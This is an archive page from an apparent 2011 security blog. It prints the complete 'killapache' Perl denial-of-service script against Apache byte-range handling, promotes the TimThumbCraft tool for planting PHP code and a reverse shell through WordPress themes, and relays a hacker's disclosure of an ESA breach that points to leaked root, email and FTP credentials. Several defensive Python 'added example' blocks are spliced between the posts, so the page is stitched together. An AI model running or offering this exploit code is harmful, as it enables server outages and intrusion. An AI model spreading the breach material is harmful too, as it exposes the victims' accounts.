Showing posts with label web security. Show all posts

Sunday, August 28, 2011

Killapache: DDOS Tool For Apache Servers




The Apache Software Foundation has announced a denial-of-service vulnerability that affects all versions of the ubiquitous Apache web server, leaving up to 65% of all websites vulnerable. An unknown flaw in the code for processing byte range headers allows versions 2.2.x of the Apache Web Server to be crippled from a single PC. A Perl script dubbed "Apache Killer" demonstrates the problem impressively.


Advisory - Click here 


How does killapache DDOS tool work?
killapache sends GET requests with multiple “byte ranges” that will claim large portions of the system’s memory space. A “byte range” statement allows a browser to only load certain parts of a document, for example bytes 500 to 1000. It is normally used while downloading large files. This method is used by programs such as download clients to resume downloads that have been interrupted; it is designed to reduce bandwidth requirements. However, it appears that stating multiple unsorted components in the header can cause an Apache server to malfunction.

The code
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
    print "Apache Remote Denial of Service (memory exhaustion)\n";
    print "by Kingcope\n";
    print "usage: perl killapache.pl <host> [numforks]\n";
    print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
    print "ATTACKING $ARGV[0] [using $numforks forks]\n";

    $pm = new Parallel::ForkManager($numforks);

    $|=1;
    srand(time());
    $p = "";
    for ($k=0;$k<1300;$k++) {
        $p .= ",5-$k";
    }

    for ($k=0;$k<$numforks;$k++) {
        my $pid = $pm->start and next;

        $x = "";
        my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                         PeerPort => "80",
                                         Proto    => 'tcp');

        $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
        print $sock $p;

        while(<$sock>) {
        }
        $pm->finish;
    }
    $pm->wait_all_children;
    print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
    my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                     PeerPort => "80",
                                     Proto    => 'tcp');

    $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
    print $sock $p;

    $x = <$sock>;
    if ($x =~ /Partial/) {
        print "host seems vuln\n";
        return 1;
    } else {
        return 0;
    }
}

if ($#ARGV < 0) {
    usage;
    exit;
}

if ($#ARGV > 1) {
    $numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
    print "Host does not seem vulnerable\n";
    exit;
}
while(1) {
    killapache();
}
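Added example, not part of the script above or of the Apache advisory: the header the script builds is "bytes=0-" followed by 1300 ranges, and that shape is what a defender wants to reject before the server's byterange code ever touches it. The parser, the function names and the limit of five ranges are assumptions for this example (the advisory's interim mitigations likewise rejected requests carrying more than a few ranges); the sample header values are constructed locally and nothing is sent.

```python
import re

# Constructed sample values; nothing here is sent anywhere. ABUSIVE_RANGE
# mirrors the header the script above builds: "bytes=0-" then 1300 "5-k".
ABUSIVE_RANGE = "bytes=0-" + "".join(f",5-{k}" for k in range(1300))
NORMAL_RANGE = "bytes=500-1000"   # the example from the text above
RESUME_RANGE = "bytes=1048576-"   # a download client resuming a file

RANGE_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")


def parse_byte_ranges(header):
    """Parse a Range value into (first, last) tuples: "-500" -> (None, 500),
    "500-" -> (500, None). Raises ValueError for a malformed spec or for a
    last-byte-pos below first-byte-pos (RFC 2616 14.35.1: ignore the set)."""
    if not header.lower().startswith("bytes="):
        raise ValueError("unsupported range unit")
    ranges = []
    for spec in header[len("bytes="):].split(","):
        m = RANGE_SPEC.match(spec)
        if not m or not (m.group(1) or m.group(2)):
            raise ValueError(f"malformed range spec {spec!r}")
        first = int(m.group(1)) if m.group(1) else None
        last = int(m.group(2)) if m.group(2) else None
        if first is not None and last is not None and last < first:
            raise ValueError(f"last-byte-pos before first-byte-pos in {spec!r}")
        ranges.append((first, last))
    return ranges


def range_header_is_abusive(header, max_ranges=5):
    """Return (abusive, reason). max_ranges=5 is an assumed policy limit:
    real clients send one range, rarely a few; the attack sends hundreds.
    The count is checked before parsing so a huge header costs little; then
    unsorted or overlapping absolute ranges are flagged as well."""
    if not header.lower().startswith("bytes="):
        return False, "unknown range unit, a server ignores it"
    count = header.count(",") + 1
    if count > max_ranges:
        return True, f"{count} ranges exceeds limit of {max_ranges}"
    try:
        ranges = parse_byte_ranges(header)
    except ValueError as exc:
        return True, str(exc)
    absolute = [(f, l) for f, l in ranges if f is not None]
    for (pf, pl), (cf, _cl) in zip(absolute, absolute[1:]):
        if cf < pf:
            return True, "ranges not in ascending order"
        if pl is None or cf <= pl:
            return True, "ranges overlap"
    return False, "ok"
```

The same count check is what a reverse proxy or WAF rule in front of an unpatched 2.2.x server would apply, before the request is forwarded.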

Sunday, August 14, 2011

Tim Thumb Wordpress Exploit

Recently a TimThumb WordPress 0-day exploit was released by MaxE. TimThumb caches even remote files locally without doing any proper sanitization. The file "timthumb.php" does, however, check whether the target file is actually an image. This TimThumb file is also quite often renamed to something else and is used in many themes.

TimThumbCraft – Image Crafting Tool

The easiest way to trick TimThumb into believing that a remotely stored image (which also contains malicious PHP code) is an actual image is either to craft it yourself or to use an external tool. Here is a small tool for the job, which also has a few encoding features, payload types, and of course options for custom images.
Feature List:

  • List known vulnerable themes
  • Choose between 2 images or select your own
  • Enter your own code or use the reverse PHP shell
  • Encode your PHP payload; this applies only if "code" is chosen
  • Base64 and hexadecimal encoding are currently supported
  • Hexadecimal output of the created file (can be used in pastes, etc.)
  • MD5 calculation of the filename that the target server will most likely use
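Added example, not part of TimThumbCraft or of the original post: the file such a tool produces passes an image signature check yet also carries a PHP open tag, so a defender can look for exactly that combination in a theme's cache directory. The image signatures, the cache directory layout and the function names are assumptions for this example; the sample bytes are constructed.

```python
import os

# Image signatures a getimagesize()-style check accepts as "an image"
# (assumed list for this example; extend with WebP/BMP etc. as needed).
IMAGE_MAGIC = (
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
)
# PHP open tags; a valid image never needs these bytes to render. "<?="
# is short and can occur in compressed data, so review such hits by hand.
PHP_MARKERS = (b"<?php", b"<?=")

# Constructed sample bytes: a 1x1 GIF, then the same GIF with a PHP open
# tag appended, the way a crafted polyglot carries its code. The tag body
# is a harmless marker, not a payload.
CLEAN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
             b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00"
             b"\x00\x02\x02D\x01\x00;")
POLYGLOT_GIF = CLEAN_GIF + b"<?php /* constructed marker */ ?>"


def image_type(data):
    """Return the image kind by leading bytes, or None if not an image."""
    for magic, kind in IMAGE_MAGIC:
        if data.startswith(magic):
            return kind
    return None


def find_php_in_image(data):
    """Return (kind, offset) where offset is the first PHP open tag, or -1
    if there is none; return None when the data is not an image at all."""
    kind = image_type(data)
    if kind is None:
        return None
    hits = [o for o in (data.find(m) for m in PHP_MARKERS) if o != -1]
    return kind, (min(hits) if hits else -1)


def scan_cache_dir(path):
    """Walk a theme cache directory (path is an assumption) and return the
    relative paths of files that look like images yet embed a PHP tag."""
    flagged = []
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            with open(full, "rb") as fh:
                result = find_php_in_image(fh.read())
            if result and result[1] != -1:
                flagged.append(os.path.relpath(full, path))
    return sorted(flagged)
```

A hit is only exploitable if the web server will execute that cached file as PHP, so the scan pairs naturally with a check that the cache directory has script execution disabled.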



References:
Proof of Concept: http://www.exploit-db.com/exploits/17602/
TimThumbCraft: Download it here
Demo Video (LQ): http://www.youtube.com/watch?v=udyEOzHK08E
Demo Video (HQ): https://rapidshare.com/files/2016620847/timthumb.avi
Original Info: http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
Vulnerable Themes: http://blog.sucuri.net/2011/08/timthumb-security-vulnerability-list-of-themes-including-it.html
source: http://www.exploit-db.com/wordpress-timthumb-exploitation/






Saturday, April 30, 2011

Mozilla Firefox4.0.1 First Security Update



Mozilla has released Firefox 4.0.1, the first update to its open source browser.

Fourteen flaws have been found in Firefox 4.0.1, of which 13 are categorized as critical vulnerabilities and one as a low-impact vulnerability.

The biggest category of fixed vulnerabilities in Firefox 4.0.1 is memory safety issues, with 10 identified flaws.

"Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products," Mozilla warned in its advisory. "Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code." 

You can check Mozilla's warning here.

The high-impact category of flaws is in WebGL and its related WebGLES graphics library. Mozilla is providing three fixes for WebGLES flaws in the Firefox 4.0.1 update.

As opposed to the critical memory flaws that Mozilla is patching with the Firefox 4.0.1 release, the XSLT flaw will not lead to arbitrary code execution. According to Mozilla, the XSLT flaw could have been used by an attacker to help trigger some form of memory corruption that could make another attack more reliable.

The Firefox 4.0.1 release is the first update to Mozilla's browser since the Firefox 4 release in March. Firefox developers are currently working on Firefox 5, which may be released at the end of June.




Friday, April 22, 2011

Detecting Google hacking against your Website

Google and other search engines are used for many purposes, such as finding useful information, important websites and the latest news on different topics. Google indexes a huge number of web pages, and that number grows daily. From a security perspective, these indexed pages may contain sensitive information.
Google hacking involves using advanced operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific versions of vulnerable web applications.
GHH is a "Google Hack" honeypot. GHH is designed to provide reconnaissance against attackers who use search engines as a hacking tool against your resources; it applies honeypot theory to provide additional security for your web presence.
To install the Google Hack Honeypot on your website, follow the install instructions. This lets you monitor attempts by malicious attackers to compromise your security. The logging functions that GHH implements allow you, the administrator, to do what you like with the information: you can use the attack database to gather statistics on would-be attackers, report activities to the appropriate authorities, and temporarily or permanently deny access to resources.
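Added example, not part of GHH or of this post: one way to surface the kind of evidence a Google Hack honeypot collects is to scan the web server's own access log for requests whose Referer is a Google results page and whose query uses advanced operators. The Apache "combined" log format, the Google host pattern, the operator list and the function names are assumptions for this example; the log lines are constructed.

```python
import re
from urllib.parse import urlparse, parse_qs

# Assumptions for this example: Apache "combined" log format, Google result
# pages as the only search engine of interest, and this operator list.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
GOOGLE_HOST = re.compile(r"^(www\.)?google(\.[a-z]{2,3})+$")
DORK_OPERATOR = re.compile(
    r"(?<![a-z])(allinurl|inurl|allintitle|intitle|intext|filetype|site|cache):")

# Constructed sample lines: one arrival from an operator-style query, one
# from an ordinary search, one with no referer at all.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Apr/2011:10:15:01 +0000] "GET /admin/ HTTP/1.1" 200 '
    '512 "http://www.google.com/search?q=inurl%3Aadmin+intitle%3A%22login%22" '
    '"Mozilla/5.0"',
    '198.51.100.2 - - [22/Apr/2011:10:16:30 +0000] "GET /index.html HTTP/1.1" '
    '200 2048 "http://www.google.com/search?q=example+company+news" "Mozilla/5.0"',
    '192.0.2.9 - - [22/Apr/2011:10:17:02 +0000] "GET /robots.txt HTTP/1.1" '
    '200 64 "-" "curl/7.21"',
]


def search_query_from_referer(referer):
    """Return the search query if the referer is a Google results page."""
    u = urlparse(referer)
    if not GOOGLE_HOST.match((u.hostname or "").lower()):
        return None
    q = parse_qs(u.query).get("q")
    return q[0] if q else None


def find_google_hacking_hits(log_lines):
    """Return (ip, path, query, operators) for each request that arrived from
    a Google search whose query used advanced operators, in log order."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = search_query_from_referer(m.group("referer"))
        if not query:
            continue
        ops = DORK_OPERATOR.findall(query.lower())
        if ops:
            path = m.group("req").split(" ")[1]
            hits.append((m.group("ip"), path, query, ops))
    return hits
```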


Monday, April 18, 2011

European Space Agency (ESA.INT) Hacked – Full Disclosure


( European Space Agency )
The European Space Agency (ESA), established in 1975, is an intergovernmental organisation dedicated to the exploration of space, currently with 18 member states. Headquartered in Paris, ESA has a staff of more than 2,000 with an annual budget of about €3.99 billion / $5.65 billion US dollars (2011).
ESA’s space flight program includes human spaceflight, mainly through the participation in the International Space Station program, the launch and operations of unmanned exploration missions to other planets and the Moon, Earth observation, science, telecommunication as well as maintaining a major spaceport, the Guiana Space Centre at Kourou, French Guiana, and designing launch vehicles. The main European launch vehicle Ariane 5 is operated through Arianespace with ESA sharing in the costs of launching and further developing this launch vehicle.
More here.
******************************************************************
(+) Authors : TinKode
(+) WebSite : TinKode27.BayWords.Com
(+) Date : 17.04.2011
(+) Hour : 17:17 PM
(+) Targets : www.esa.int (European Space Agency)
(+) Document: ESA.int Full Disclosure (Hacked)
(+) Method : UnKn0Wn
******************************************************************
Text Files:
  • Main informations about server.  Click here.
  • Main accounts from ESA.INT (Root Accounts,  Emails, FTPs,  Admins,  Editors,  etc). Click here.
Emails:

Preview of Root accounts,  Emails,  FTPs,  etc:
The ESA Logs:







source:tinkode